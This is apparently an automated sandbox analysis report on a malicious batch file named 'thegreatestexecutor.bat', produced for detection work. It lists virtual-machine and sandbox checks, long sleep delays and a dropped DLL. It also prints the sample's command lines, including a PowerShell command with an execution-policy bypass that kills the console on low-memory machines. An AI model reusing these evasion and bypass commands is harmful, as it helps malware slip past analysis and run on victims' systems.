      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Check if machine is in data center or colocation facility
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Service
      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDisk
      Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_StartupCommand
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D324F20 rdtscp 34_2_000001DF1D324F20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5817Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3947Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1367Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 481Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2269
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1909
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6769Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2831Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5874
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3850
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4630
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5157
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 5817 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 3947 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 1367 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 481 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 2269 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 1909 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7812Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -11068046444225724s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep count: 4630 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324Thread sleep time: -20291418481080494s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep count: 5157 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: svchost.exe, 0000001B.00000002.2535921491.0000023F4B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 0000001B.00000002.2542168207.0000023F50655000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1364598348.0000020A6E270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM^
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: netsh.exe, 0000001E.00000003.1552969251.000001A3B3E87000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001E.00000002.1553751077.000001A3B3E8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1684520069.000002B3D8238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D324F20 rdtscp 34_2_000001DF1D324F20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell decode and execute
      Source: Yara matchFile source: amsi64_7696.amsi.csv, type: OTHER
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
